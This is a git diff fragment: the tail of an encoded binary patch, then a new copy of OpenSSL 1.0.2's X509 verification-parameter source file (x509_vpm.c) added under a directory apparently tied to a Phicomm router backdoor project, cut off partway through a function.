zPG5&bF|}IJTZ;sRgd~yGkT_aQGwFIYo9pc-6f4j6b*<3QJ2(w7Os=|IS_Th)nFCvd
zg%N(r5Pnm4!H>x#w8JTN?{Gr)QRe&P?!g18S`1O)`TCG4Vt=-vi58Nj!I#t1MBf{B
zQY`So=*WMhC_Lm=2^KbYM>2b)kK~Th*4VG<V6ACQ?2N!*uRL_=0GITl%u@)bIQq#$
z{0^<<)uEG~2-45Y8GOr{Aa+h_tFJ@~{n95%-mAcScPIXc10A87JTl6j*^M6Orqeb0
zJcP!2qTlC<Pn8T;62pGY&`3NZ9WnI*HaB#%h+)11r5KzDh48)j^+IUG-a;^1LBsLb
zh_gnA&-mHw=qbw>%VtrJ{K7~4Qd2NoBhGA}vFioAibF&-U#LLXH$~JihPT`f0#Fk<
z_Pn&nfz0Ez1+&Q3h_ibK$fSZYKh%w_tN=pJ>MGi)*CEV=YSZ4E-vuc`#i6Uy6qdb%
z2k{OGbP~16!cO*0+HKlLjLbq)4w-ESv1_!v<gPN@r|zLDiH((rPCr4GMiP!<Q1PQf
ztN#Iag{~O4v~TkcY!>Wu3d(_YW<FzOEmej(o>UL^YvlQL#;$QNgD_QQPhMk@26d#M
z><uF$Y!`Kw1?o~`F@c~P@)(IW{Moq@J!(IG$RzdAS3&~{d(?y@t|kzk+2<YnSKxFY
zfwukwM$1~P|7;`kOvL_m66NT|U3eUiU)a8jCWd$<XUX)%QuEv*2uBTaK_r5oQW{D^
zgfNeC3-Ixz=Zkp}k`ej#XSJ3Fz9e-%Rvo(jP@8l^BeR{HO2I?D!nd)E`>Ws$1EA?u
z#5+0!)4^T(SCc-|Q{*b~R@qKCPqwMvZF|s5il2op5D`1OA3aAjRS$xKeV*C~COBK&
zjx}*z*tv`8C>ve7cf)nMEoyT{%Zo?JZ%z9dd3@F#5X6b2Md&g(48k<+B`U3Bu#QOo
zh7J%$R3Aj_?Mbv!b<PyZW}Zh2Ur2q9Wr-XOCzg2!K0}F;tJKo^cyGE1B2-yW?f~XE
zcWpui3J!1)xqHHxz(_DM&(SFoIn&QU0fS&kr=zJ+JG>zfvcJ&p<PsR~*aGeq(lF@J
zg5mTtnt&>t7J=hUF?RhH?DBt!NMmpFR(771PDQcy9Hle{tkRo0NovcyD|I(GV-Bx^
zHSeTWAz$W+2aMW(rS1`@!4FPEPC2@F&SQoxd_6r!oUw|K{t-L{Us|jul~8J1nVMV3
zd&>-4uv0zpFM{8eBpz9R&ODWKb5PR|%IuesX<!~ERdQK$1p?CUgLt4%uBnUH3eOn2
zn1HB0aEUy61iR?J7oi`-<YIV3!|14Ui5ACe$kwENV0SLn!n20f?Rbi{6IOZ1&QL{_
z2r7sj9f6Bf!$S7qaP6<jGT!YUU<IjnkLX0{PB@1j2NRy_u`WnoWMCf?DYlNNW=};m
zF^t3Zuc>`=?7Nb9WS*5{d0*;Ua1?b)<CPS<QAmALnX$e`50AAl-L805p-AvD^748#
zbrN_*oQ3p>#vd;y<q~~<&&G}E7L1%VTBS;`NuQ3Mdrk2@oq&l1=*rff%s%Up^dFTV
zA=IV$ovB};Yk~*R>or1ADDVC8W7@4JX;yJE%|%81)6+A-^L-`q#DCtDr&En!PG&Lv
zmOnykB%ISG-t?P^Pl^)F=qqfP#(NV#Ak8m}(9RVl8S8no4eML84ZVrw?(`zFcK^ml
zmB`8eT;z{ZuY!O?VS#{eNENipg<FudJn7m<?c*B{D^6$pb52jBz6%1XDts3Uy<cOY
zH&TbDoRWEJ@MZ6|$55`EOMQcaFAcsNe_4UTh&V{9O>g+4rqf4A_uPWY^a*dB_7-&9
zYBfHUcZiXs`U|79PWqY|aelW0mG!y>{o?ajIG5FPtBeEQfv2E1q4Kmj^)OzgMlG4t
z#WXtpkXnkr<X;h-beK*H_KO$Nu39c45Cfw_Z9c<(JbgL}5dTDV=d!ZkfjRa;ahR)*
z2KtXh{0rB9-v2@vEB6UFV!}3KBz{u*oZXi|S6X*G^9D91w8D?Sk*bAU(`oVtpVX5n
z_M=n_XEU<aH&v}4vRWmwR?VndQ%9Qvl3=P96@C7MwS9W>?mERRnq~I;)bCIvoBsVB
zC=QN9hIZ4)#`j7YX`v|g-?OphNm_Mao7tZ>RR0*x?}(Ilv*<FcJ(Ge3mZK^H#ve{a
zA&Crd{NI%UyaTm>&~H^Z;=D-dfm7&B-hpaKizf7`CR6}PO~N0FvH!y@#;BDx&X{mq
zH)>m5C6?NCo_KlG*@(5#`#4*%zA7hwS{U!9wRdhEpSm6a32XD2m`Ogv>3L!!wvFYI
z{9B+*pJ_T{@YRq`EKGJ{A--^HzMJ##Jso_-aR&B=Gz_*L6ss7;nl=;Zr^V5RD!+DA
z`6epAJA%kX=N$T2qhHk?pwjI)zO$y`_&qns`n^)|1j<vZ;8AqopZzGY@lE05a@*t`
zXvUb4i+;5!qV>Ty#keYg=Td_OJ;5}^(W$b4wF`L%j^nUDOZ^GNi+~4h9smi}Bu94N
zglCrGMZ6&Tl;MHG*9DF<_p*&uG(&3yR|-fXJ2%_`dIY_)^zX$PcMJ9wa7SA2WGjVg
z-`%(v_Y5=>G3UcXI16R#BKTV+1_8`BEQC`L_|T@ox&%U%rg0q7t`EqTrOz-jPo!@n
ztA{8IAuwGe4<5+K*&6ujlDz{k+STZM!K*3LWfA)bEs})qW4HLF?KMs--P>!Ud5-<4
zaaF|LXNr%+_-y{jF)&FAKXGrx+$@??@ZH(E3zXsulDyj@vW~djB0oOM?<hLILsP4>
zC~+()xCfJ(W?znG>wcC$n9bX3eUjK-Td6aCk-_&Xx`#qX1o(tyKV>uy9*B>pL+Br(
zw*8?pt36E9opSzlC`o@)bWozNG!vf~;#AgOWY@hMAM3P~4!&%itK19MPfnIy(+38-
z=^!Q-1#r71h~7D#=2o#FiI><b{HR@_kbnnBOF*6qj2V0~{`2(v`tuZ>cHo2kllUfA
zg)t{y-wPhV>tyw6G(Y&i${_D3gqlO*>`7>eDHRSESEmdH>9u{7Ug`1&Xo?9Y;lS_z
z68D7EEfu=>f-ipWi_0kX*M}Rxokr3X@bP(-=5T{wybm|j$miDE=!s+wZ`~m>BD*t}
zrA;-ZVc{W^18I_;NXYJ!Im%KeQ$qGdnWOAMl@$#$?J#|bi2K=KxETc8;;GjudeBkE
z%N9O9^vbY;nX}5Y7ho^f)NR_g-hxUPlDpDAGhzCU!%Y=JD4BA3EyXz-P)UDYz=amD
z#EC(@nBT@gnMTwfI%e<7bUF}j)WtP4+Nsz?u|oq1`h-ngOf3+_b)xoLFNxZ9y4bIa
zXNqDU;x}qTq?8RhS-V9PAHgOT#VxuRQe^Rx^s(k}c!?0MszO0own9`rjb<o2yh2w6
z4_VwTihExXoV%&`cr<zm6_3L$p-teK{ufg>OuQ2j?zhx~87`pZ%C><P7W(8b#Oob%
z=vJ~Tg!YN}B8-d*=OB6^P|E8}1-lkws62g)7%J+<5Df`%KSfw@Esj?kOfmfNJ#j1b
zCtV?e(#1GOaBhIvGu9+C@z6n(c;f03&v1Pey_(KLJLv%uIXmIdk^o95+d&UeU7qj?
z#X&+iC3EPz1Yyd}waa@&(tBKj;KedH(FHGCFD=C)lbVr>sZM`Y;TO|>Ay;Uxt&=RB
zt)!&LJ6rG3S#haHefX#LA1hjKKe1SFzzL(O+)yPl`nDAgUiyWRlxgf$RiiJPh`W6_
zbA?qmzfCLrkn=OS{1c~&Y`HWLC_`~DDedI^avvE7i`+Jx;3;z&wI6Ko8aR_Ll0;ZB
ze_iEXr=^6vo6<xV8c&f&&8LD1yCX0T^Wovtv2bGP67<nA1F4b3hB}XRyu2Y$=N-5T
zSgH$uM#5%se1gO`S^o5lk#J*i{D@?J+Gyr4rSFtD?V58!Ek{<z*V{*^Ny?eLga3&)
z`dotXei=THeOENtIiHrWC_$+44*ZBJIQ4#7u>+@-L5*y%Q%`GU)4o0MF43T%Q4|>1
z86`JHqt3tW03O9{0qSDCEW;Dl6omNTppR9M&7ps%vyyE5GQ8j0s};hX7Wx7ot|^ZD
zQ?%ljt-S#JbFGcPmbxulbk?XM@8IpU#$Ja%55lxiN-PNXzA8>%2U>ya6^UFI#>=II
zF(6J~20I|IVugw2V5465#lIpUWwDL&c2v4Ln6bspJd7@JCole@{zOtXS|@o|kA)J`
zk&c*M1yKmm-#<6+B^PEN8v4FgQyW{ed|h>$XI^7?Zc|e<W<;a&u81|xpVx9_tUf%y
zxyiGveR*rV!-8OUYN<wje|Kw-<?mYVpV!^q2@d{Xbxrkj|McnpOIthr(`$m5q#Nq%
zzu~W1ur%Ij#r?I_=U3NE3w}K=UV|H_*HqWcI7`A(0)6!L;YagG!`uZPIDC>Y91@8%
zQ9X;UpYJK^^A(*`KDO)@w2bOZQDr!Y6p64Jl|Ms0XW|)B`9^xqs_<<u4p&qTm4qw&
zH<cO{Ra=e;Rn#QLSQS;F3jeH%N>I$IAmdl!w+TN=m(rhbg)dQD9HK%hqmv^_C($2+
z%I1rDGw`~LFr*~?5i-G9$!s8*4HY%TcUDvxOeEENm*|mN=+Ep5-%Su#xuv9`!k;L$
z##dBA43wKS;ZmIi*-ZSzaT=b}$X}Z(d|RMPWugQvD}I!!?Wyn?Pf*1*qM}hzX6$(a
zqyhYvQ5~dv=nvYsg=8imv#$6KO-+%4PERTQl>R`sA+qC5km27_O3kq={DwB44<vNH
zK<PO7@KoWsUtwYo#btGu{IW<31Kkq*K2x*{;S?nA=3>}zd&#T{|4`|yimIEAF)C`d
zj0siDOpFaxG!}P_ub2r0Jqn6!KhBy^@=#H}0_j6bh&K{l(V|3sU@7cx1fcJRNUmyU
zeMMD*{H1um=(}utqaeLo)w_R;tamfnC%?W870IHKZDaCkY>+N1@cT^hJ3`Nb?Kfom
zZz(D{uc+d-qS+NYiY~`<R>dtv-FTXKZ^6^Rd&vc`1eAA~i27=U8gSYU<WuVv_73tS
ze>>Sh`EZDQ7}idVDSmFW7bC`le3z<w9WneL=zi&he40sKr4$g5ggyRmyt+$XDbCMI
zjM+xT>r`S0UN@nSFq}m^=}={44@&ghln48s!nCc3Zf73s;XK%Wg_V;4B&z#X9_*;X
zDg~9KD;JAxkB8Uw=fP&=!AymXWBjhlgLS(w8V>^sdy?wHW_;Xd$HU#D#{;$NVO5Xr
zM^YkezYC-Gy``|riAeNG@uk!$RrF3{3F%%M13X^Tl<X*G@q&1tt7s=u1tj8Kr?6WI
zkn#Iw;!QMHsWLy6nHByf6c8Uv;o@J2;GM8-d9d3RM&*>~d5^-lo%bq?_uGpK(>_FV
z+1m;`gO~|jTgF$Eg(uW2y~@=@r+EiJ=2zHhs*Z}?h{;V^>zF7r6<sP%ED2|0sfZ<)
zR_re>*@Hp!<zPxe@+S(_rJnaP`ASQ~7x6Eblw@c5(Pbsz<W6L}V#Y_$`SiVkaQ!Z9
z2kb0`Ps5W^qkM?JC1SO~0A%TSf%t4tu$b?WuUGi6!o^&Ve6zyeRCrQ7*TN9Q=O=3J
zYEk$KJPH3q;bNW!7FYP0Dqh~B=r=0-GUXFu4g^Lg9mMBu_%Nlv$%p3-JPH4fat<*E
z0o$qYh;mXfmjHV};k&AkK@xr;v*;BiRK4p*iAM?5K$c#6<miGD58XN+o%V=VHQ-s%
zK85S?po{*X@Y6NGo+a5{&w&S!RZY!-$Q>$x(>;NF^hXQewDZeHe^LSb`~rBW08ab4
zeEfR~-~$El?-#)Ty#P-8oP2WWlhN_;t3NCM{3+~0={EfG(Z5oF&*1|27{sG|d?o@X
zx$9LZ&}+!43LjFqSVuyangV>jUI1?>fHxJuTY-~4cd8+v{d8>s`kM;iKPrI#q5z&O
zfd8og{(1rY-2ynRsi<8u=`%i(ZdW<_oA7#ti!~t1DNg0<ulfS`Rf<ngP0C_D2tKO|
z(61|iZ!UmuD}aBe0KTID{__I(Jq7Ul3*h?-;LjAmUoC)tPyqj|0A7yqkgs1(E`Xm?
z0Ivs5{r<mCA#cd-K`t*q-&z3gEPy8p;I|jR?<;^mT>yWx0RC|Sd_1P2e0G~!06)I~
z9w~q?E`YBDPImsmRB7i^<-=napubbm?^5(yXIf+Hyka39&nWtRF8Y5Ip#NOazo_VS
z9QX>B0;K0(UHEwlf5(N-RrtpW*K6KRg&%X8)KcSH6@Hw;Y0XaQPT=|4b+4j7%f;sf
zg@4V3k0{)5;U{3hNbQ=VaJ_<=rtpO>e73@4E<C326$*b+s_&uOaryMWwE+IJ0{Fv<
ze=r~!>%G*U6<+7U-&OcLg^N8Es+M5h%BRn9z{w6f6usDIf&TOY^cNPu7Zkud3*dGE
z{Kp0G`wHO01@LEqQ@fhZly=j5!gm#Zt-{5=5F}&a0Qv0m)dKj80=NmB<bJ03`=xl#
zRSKU{B>}y+j2GbZZAE{Ui~bh{=$}yZ7btq&me&f<f2`<dD|)<&^c5`GN&k5Y*W>g8
zg)dgPjt^HVe7VBUP<$+f-{j)IUE#MXTn!t~PT*Q+#X>xG13!-KM^rWZyVu-#c4xe!
zBi7d1(Xq6(ZI!2OMSI(-*ve(G_MV=u9?$ZXoy%e?dwb*UJ)UdZEtQS+g0Q{EiuJa4
zERXfBytcD_nWwF%Bi7z$wRiTe?COlIZnfH0C~n<d9V^?`$r_;Ytn9SfdpcV?Vr$xa
zRxU?@kV*Bem8;u@9C{%kqNJyNO;=m11-3a-Pj$4uhW-TU&vZ|$Av$lC5sl58J-aE~
z9BVdaMZ+;q@2Xg5d^J7Rw06YXJ@xaiY;2wvYhAW1*3pI5wvZX5knVU-cUNz_gzD!<
zW7J%<C$@B5Y;Gj<C0qjGmS%hnh|HTS$d|QRtsbLkZZI~lz8P9HHP4UCZHTq4?&gw&
zIhRR9nntSN3D2J&>yAUJFul-CDN;jPki|W*Sg(bCLXB0i<*h3_Bpb3DT6G;1mhu-g
z*EdJzgb9;CLwIg@z7dTq3Wr7)WZ#55%}D9Hx?6Thuho-n1lgrKzI0XlI!UBDF}$!b
z)_7U?%GmOrc4b9WiM7RhdfGcJ$wr7^Zq(U|?iS!&1IlJa$R253wNhD$s`SQ}Uf14c
z#Y7#|n%L-SWGo?FbU|cpbGRWqUvPy3ba!<#)vjGVx}~{B#qgB|YQaN$J=r#`MxU+h
zyf$xHTUYlwULe{djUu~@oUnZ@9I>N=Jh408yMms};>s(8$^^7`Ky0kr>d9K4=z7~N
zQLSr~6Ing+UW<lGd*>QOE=N(TM;N7k-duQ}0V6ai?*c2<HG+6W7kCJLrN!G<XFW;+
zE3-0NS9Yp_(i>lCwJ(*`$l}XZE?=H|Q{Et$QYl)VD@0Rh%u|3E4ax{3`!-vZs5@GF
ztp(i}S8QMs-ieXv#xbgcV#KbTuKY%g9s#y>;hS1cDun>>$N?~=7-hYPNv&#F%?~e}
zcUd@;>ndW1nl&*BNvja_gtD3}XI`SCuqex$n&-_A$LgC~R7?@>fWV5ussa+ZUwa?J
z1>amfYBI`2d{I?6<f2yGI5mgzQRgC#OK83V!Hf#vvfb8-e2vt@Uc{_C0^3%=q4HD=
z!pX8FA{&c$!`jNja>_x6nrv`U6V#XG<Va}V$ybiiPT{G|>T?&9f%B;^@SKu4l~4eA
zJsrJnPHJk2t?XO@=Tbh`xL|(cyr!^l2?Tc?>KI%j`83a8(A4ZE8zmJXh0R@~i)5T|
zwVVc}a--Fl_`BNN8n5isYAy`VkIcR@)@aN(=Hv$RD0Eb_MwN7Qb*<7-E~gf{E~wWO
zOfdnI!AIFoqGVL1FojarP{@tDoDk9O_GNOmbT_Z9qrJ6LD>h2w94j?5TbRvc+*I<3
zBC7yXpN4m?c1{s;7dA{rNpqEruC%<P^;%_$FI8e?qbrF8l+fx+b#g_ctLUjph4fsZ
z7-Gx}ZY!c3hUmuHZY5R(a*gLQh-{#|72zt9+-a_L^A+Pr%)+vSf~lO2_|&845wXq<
zsYP!oo+sn?87@Imn$PgBGW=eJ7vo8LW=+3K;lziIa5VlWhWi;#w~i?hJ)J>l`U;%a
zQgY+;pCV|Sw)mR<EQZsXUgMWA{8Wb1J!(pB{%s8B{8urY^B-b(0Q|Jv`x$;Z!)K7e
zkVr1=RW$tqhSSzf<N7WD(er+}h0*hVSyTc-B%-Iiisth)!_Q*4mk5#QaSnc(eg?zO
zWq5?)^leMiU&-)lhSND5C3<kVkKw$B65;3Jr}+eMUP6iRAbuLx-%;IsIv72-kN#dt
z^xQu0F?x<q84E%rqOZYE%QXt%`x(ypj4LB9lFxKJHJ?iuem=ujF?<HY*A>A3%5bjd
z`Dz30)?a@DBb?jkB<yP`x$U!#;dEb3>p#HouQU8rhI9TOGo0I}Ol{mr?o7t#Oonql
z7c!jlna%K8#;1wlT+cR!bGbJ%oXfp~;au)chI6^UWjL4nIK#Qzi`2n}yI&SFoXfqj
z0De2ex&HsbaIVidb?`%SIX;i!T<%p2{|2-34GiaUe^3Db4~BF8e_%N0^E$&h{ksh3
z`a2a+4vE@zA%5C#_b8mgWhKL3VDx;RI>d0!=NxtL>F%!(!?~W_4Ci|Ois2VAeRdbX
zM-=YX|5HZK_5Zdy#B%HT62rNkZR*1&(ev^CH-(=KoZI0YMt?EW|CjWy)sfuxzqbH>
zxB&iP0eq_Z4oLj@JQ8Dg9m;gSuPcCWWjK$wH#403;T;U;cKa#Ar!%>~XE>)nz;I4~
zkl_a7bBN(w&rcZ6>5J6?GuemJPh~h?SFA07|A683OrPH{JjC#47|!{>uW+~D7M*~~
zNTetC+o=o>qfGbXOosD*i7=eo`F4iSW_(^^IM@GUhI9S>UqNLgxBk@%ck6#K!y8af
z>wh)Fx&GY@AEiITIsM-l&fE1N!%Zf)XcB2J?ab*b86H8o)^j1lFJ-vJaIWVbhI4y9
z$8aw9FvGc>kENiDME2zEJ(b~H?l%~I8R}^L?_fCRb05PwpM4DH^LU!!oX@8W=X@qi
zChevE-2PJ-&iP!daJOI0V)T4m%vCtWVQ$ZbjQ(PjX*+Z<ocHe<hI2lDWjOE0%jjYo
z66r}Knt!vxslTEO-^XxnpQ-A?8qv>T^lviU&+v(4EF_}me9mMzx93F+=k$#Xp9@}E
z|E&!FCc}To@OcdX4a2$J9$+|SHUBpX;71wG^_)O2NYvg&{4}4r48NS=0}P+f@b5F6
zx9cFon;3lsIT@1M&Vvl+^Xxwu&d2XmzhEQyd>vV>|15@c`db;!*FV2y_yWe~*#h`0
z3}49TKV<k73@<+wFG$qh7W}lHr!o9WhJS<Mix_?t!xuB$V)#`I-@@>z4F4X(uV(l|
z3@4Y-dOpQ)>Qap#WcW1<e~;lYhL0g7kjM^8@Y8%IGQ5@HGa0^=;R_hf`*$hB`MPm4
z!?|DGd>WV{kv?nj)B603;e8DMEyFqeqYUTt&oX=+<MS@VN9i8`5mGUJ6!Nt`*D9R!
z+`#Z{4Cj36=+Fm===<^0e3mkt(_hc<O^p5*3MYLi#A-gjVf33B{t&}AG5lkN(>(Gm
zh95WsFGz$Z@YDR?VfX;UCz8@g)UHANG<|^KTNr*Z!+CqZ&2XF1|AOH+GJK!H-Sgld
z82!bJ{%wXk3?E;G7bMbu8-7~<9)@#!-pz2X=Z6gE<Mc#wZY1K*$7!Gdew5)GQAg`@
z0yPwg_}qq{#;X}Vi{Vj*bA7I0IM-(>!#VwGhI9HG7;ZATHp90u`~!yb{mx0}fC!1&
z^+Wu0yUu1fkN;f^pTX!IhLZ_3pZlib1&R1C!%yRT8NQt1&oO)j!>6+N(8cgd*6-ZU
zPiOdcMn9e5w=jGb!@tAu0fuj4xF2~+#p)+s@P}+dN#kSXtN1ri9G|A}0rk}M8`S#_
z7e1`sA9mqys`n3Exc>JB=N8EV&0qg}gB31Z|9b=ax0IALy}sw2bm96Q_H!;=-@_IR
z7$5!b7M2lXhU@#&eJ))8dxm>lxc>JHo|4gg^uK55aN+tM^ClOr?=e5@!u7r6GICfX
zZ3lh-wb_O1`<mS@T;IzaaN+v?<!vrp-?O~ih3k8kNf)l~Sw82&^*zf&E?nQU{LF>x
zdzQXqMz>errwq7oeV=ls3pY-a^`kCa-=|#S!u5Sh%Z2Ovl-pdmzE7ES;rbrrb1q!p
zgFNKI^*zYaF{9h7?>mbBFOK!QzAqSZ(d+wyOI*0V=hx@L^*z6vT)4i^x5I_&dwch}
zaD6{-p9|Ob^Imb``hMQKE?nQw^Qi!({aoMA3%GE7KQHRS^}iSLRQIl1ZM81N)9R7W
z6*||`-qBiZ(cP44af73JX>YHmx~Gd?h&))0D{u1EQ{C3JdNuAZc&a<QtoCaB6Yy!`
zdYF2@wliMc-P6^LkLv4ChZwi7z*lOzcJ==y`N4%knle|GXPwI3spdIdpu(Si760~|
zhFDz|k(o`j*+$wiNj~Xw0M#v%uVQUW*)#AXT!kfqM0&#|SL1H^=c0gk{=e1_qAu~I
zH3CmszMi*qnU=4gbts^`3fr2@<0r+C)O0Fe@YkQs$&85y)vs~ms=nI{TCRT5-dyK7
zi(XZqW0ZH(wgMv;ckAD$>ibc~lkPu_(Vm8Qy6fMj>ffTqkEVCmw@{GJfBee7b(}5-
z-FW<TecBsQ$|sxfDzz}#roN{f3v3F0?)u|^xqSza=bl;g*W-DLgtFweAAOF<SHI>u
NSt-HlQr2DnzX73O9a;bY

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_vpm.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_vpm.c
new file mode 100644
index 0000000..3222394
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_vpm.c
@@ -0,0 +1,652 @@
+/* x509_vpm.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2004.
+ */
+/* ====================================================================
+ * Copyright (c) 2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+
+#include "cryptlib.h"
+#include <openssl/crypto.h>
+#include <openssl/lhash.h>
+#include <openssl/buffer.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+
+#include "vpm_int.h"
+
+/* X509_VERIFY_PARAM functions */
+
+#define SET_HOST 0
+#define ADD_HOST 1
+
+static char *str_copy(const char *s)
+{
+    return OPENSSL_strdup(s);
+}
+
+static void str_free(char *s)
+{
+    OPENSSL_free(s);
+}
+
+#define string_stack_free(sk) sk_OPENSSL_STRING_pop_free(sk, str_free)
+
+static int int_x509_param_set_hosts(X509_VERIFY_PARAM_ID *id, int mode,
+                                    const char *name, size_t namelen)
+{
+    char *copy;
+
+    /*
+     * Refuse names with embedded NUL bytes, except perhaps as final byte.
+     * XXX: Do we need to push an error onto the error stack?
+     */
+    if (namelen == 0)
+        namelen = name ? strlen(name) : 0;
+    else if (name && memchr(name, '\0', namelen > 1 ? namelen - 1 : namelen))
+        return 0;
+    if (name && name[namelen - 1] == '\0')
+        --namelen;
+
+    if (mode == SET_HOST && id->hosts) {
+        string_stack_free(id->hosts);
+        id->hosts = NULL;
+    }
+    if (name == NULL || namelen == 0)
+        return 1;
+
+    copy = BUF_strndup(name, namelen);
+    if (copy == NULL)
+        return 0;
+
+    if (id->hosts == NULL &&
+        (id->hosts = sk_OPENSSL_STRING_new_null()) == NULL) {
+        OPENSSL_free(copy);
+        return 0;
+    }
+
+    if (!sk_OPENSSL_STRING_push(id->hosts, copy)) {
+        OPENSSL_free(copy);
+        if (sk_OPENSSL_STRING_num(id->hosts) == 0) {
+            sk_OPENSSL_STRING_free(id->hosts);
+            id->hosts = NULL;
+        }
+        return 0;
+    }
+
+    return 1;
+}
+
+static void x509_verify_param_zero(X509_VERIFY_PARAM *param)
+{
+    X509_VERIFY_PARAM_ID *paramid;
+    if (!param)
+        return;
+    param->name = NULL;
+    param->purpose = 0;
+    param->trust = 0;
+    /*
+     * param->inh_flags = X509_VP_FLAG_DEFAULT;
+     */
+    param->inh_flags = 0;
+    param->flags = 0;
+    param->depth = -1;
+    if (param->policies) {
+        sk_ASN1_OBJECT_pop_free(param->policies, ASN1_OBJECT_free);
+        param->policies = NULL;
+    }
+    paramid = param->id;
+    if (paramid->hosts) {
+        string_stack_free(paramid->hosts);
+        paramid->hosts = NULL;
+    }
+    if (paramid->peername)
+        OPENSSL_free(paramid->peername);
+    if (paramid->email) {
+        OPENSSL_free(paramid->email);
+        paramid->email = NULL;
+        paramid->emaillen = 0;
+    }
+    if (paramid->ip) {
+        OPENSSL_free(paramid->ip);
+        paramid->ip = NULL;
+        paramid->iplen = 0;
+    }
+
+}
+
+X509_VERIFY_PARAM *X509_VERIFY_PARAM_new(void)
+{
+    X509_VERIFY_PARAM *param;
+    X509_VERIFY_PARAM_ID *paramid;
+    param = OPENSSL_malloc(sizeof(X509_VERIFY_PARAM));
+    if (!param)
+        return NULL;
+    paramid = OPENSSL_malloc(sizeof(X509_VERIFY_PARAM));
+    if (!paramid) {
+        OPENSSL_free(param);
+        return NULL;
+    }
+    memset(param, 0, sizeof(X509_VERIFY_PARAM));
+    memset(paramid, 0, sizeof(X509_VERIFY_PARAM_ID));
+    param->id = paramid;
+    x509_verify_param_zero(param);
+    return param;
+}
+
+void X509_VERIFY_PARAM_free(X509_VERIFY_PARAM *param)
+{
+    x509_verify_param_zero(param);
+    OPENSSL_free(param->id);
+    OPENSSL_free(param);
+}
+
+/*-
+ * This function determines how parameters are "inherited" from one structure
+ * to another. There are several different ways this can happen.
+ *
+ * 1. If a child structure needs to have its values initialized from a parent
+ *    they are simply copied across. For example SSL_CTX copied to SSL.
+ * 2. If the structure should take on values only if they are currently unset.
+ *    For example the values in an SSL structure will take appropriate value
+ *    for SSL servers or clients but only if the application has not set new
+ *    ones.
+ *
+ * The "inh_flags" field determines how this function behaves.
+ *
+ * Normally any values which are set in the default are not copied from the
+ * destination and verify flags are ORed together.
+ *
+ * If X509_VP_FLAG_DEFAULT is set then anything set in the source is copied
+ * to the destination. Effectively the values in "to" become default values
+ * which will be used only if nothing new is set in "from".
+ *
+ * If X509_VP_FLAG_OVERWRITE is set then all value are copied across whether
+ * they are set or not. Flags is still Ored though.
+ *
+ * If X509_VP_FLAG_RESET_FLAGS is set then the flags value is copied instead
+ * of ORed.
+ *
+ * If X509_VP_FLAG_LOCKED is set then no values are copied.
+ *
+ * If X509_VP_FLAG_ONCE is set then the current inh_flags setting is zeroed
+ * after the next call.
+ */
+
+/* Macro to test if a field should be copied from src to dest */
+
+#define test_x509_verify_param_copy(field, def) \
+        (to_overwrite || \
+                ((src->field != def) && (to_default || (dest->field == def))))
+
+/* As above but for ID fields */
+
+#define test_x509_verify_param_copy_id(idf, def) \
+        test_x509_verify_param_copy(id->idf, def)
+
+/* Macro to test and copy a field if necessary */
+
+#define x509_verify_param_copy(field, def) \
+        if (test_x509_verify_param_copy(field, def)) \
+                dest->field = src->field
+
+int X509_VERIFY_PARAM_inherit(X509_VERIFY_PARAM *dest,
+                              const X509_VERIFY_PARAM *src)
+{
+    unsigned long inh_flags;
+    int to_default, to_overwrite;
+    X509_VERIFY_PARAM_ID *id;
+    if (!src)
+        return 1;
+    id = src->id;
+    inh_flags = dest->inh_flags | src->inh_flags;
+
+    if (inh_flags & X509_VP_FLAG_ONCE)
+        dest->inh_flags = 0;
+
+    if (inh_flags & X509_VP_FLAG_LOCKED)
+        return 1;
+
+    if (inh_flags & X509_VP_FLAG_DEFAULT)
+        to_default = 1;
+    else
+        to_default = 0;
+
+    if (inh_flags & X509_VP_FLAG_OVERWRITE)
+        to_overwrite = 1;
+    else
+        to_overwrite = 0;
+
